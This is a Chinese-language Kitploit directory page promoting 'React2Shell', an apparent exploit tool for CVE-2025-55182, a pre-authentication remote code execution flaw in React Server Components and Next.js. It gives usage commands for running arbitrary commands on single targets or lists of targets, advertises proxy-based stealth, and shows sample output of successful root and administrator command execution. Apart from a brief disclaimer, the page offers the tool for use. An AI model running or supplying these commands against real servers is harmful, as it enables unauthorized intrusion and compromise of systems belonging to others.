Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
React2Shell — CVE-2025-55182高级扫描器 | Kitploit
工具/GitHubGitHub/ankitspandey07/react2shell
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队远程访问工具
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182高级扫描器

查看仓库
9个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

@#React2Hell — CVE-2025-55182 漏洞利用

🔥 Next.js / React 服务端远程代码执行 (RCE) 漏洞利用

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React 服务端 RCE 漏洞利用 — CVE-2025-55182
 作者:Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — 安全测试工具  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 概述

React2Hell 是一个强大的漏洞利用工具,用于测试和利用 CVE-2025-55182,这是一个影响 Next.js 和 React Server Actions 的严重远程代码执行漏洞。

在 React Server Components 的 19.0.0、19.1.0、19.1.1 和 19.2.0 版本中存在一个预认证远程代码执行漏洞,涉及以下包:react-server-dom-parcel、react-server-dom-turbopack 和 react-server-dom-webpack。漏洞代码不安全地反序列化来自 HTTP 请求到 Server Function 端点的负载。


✨ 功能特性

  • 🧨 远程代码执行 (RCE)
  • 🌐 单 URL / 批量 URL 扫描
  • 🧩 自定义命令执行
  • 🕵️‍♂️ 支持代理的隐身模式
  • ⚡ 快速、可靠且易于使用

📌 用法

下载工具
单目标模式
root@kitploit:~
python Scanner.py -u https://target.com -c "whoami"

多目标(从文件)

root@kitploit:~
python Scanner.py -l urls.txt -c "whoami"

使用 HTTP 代理 (Burp Suite)

root@kitploit:~
python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

使用 HTTPS 代理

root@kitploit:~
python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 urls.txt 示例

root@kitploit:~
http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ 示例输出

root@kitploit:~
PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React 服务端 RCE 漏洞利用 — CVE-2025-55182
 作者:Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — 安全测试工具  🚀

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://evil.com:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://example.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://tale.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\Ankitspandey07\React2Hell>

⚠️ 免责声明

此工具仅用于教育和安全研究目的。 未经明确授权,请勿在系统上使用。 您对自己的行为负责。


⭐ 支持项目

如果此漏洞利用对您有帮助,请考虑在 GitHub 上留下一颗 ⭐ ❤️


👤 作者

Ankit Pandey;GitHub: https://github.com/Ankitspandey07

由一位自豪且充满热情的渗透测试员用 🔥 打造,他每一步都在不断学习成长。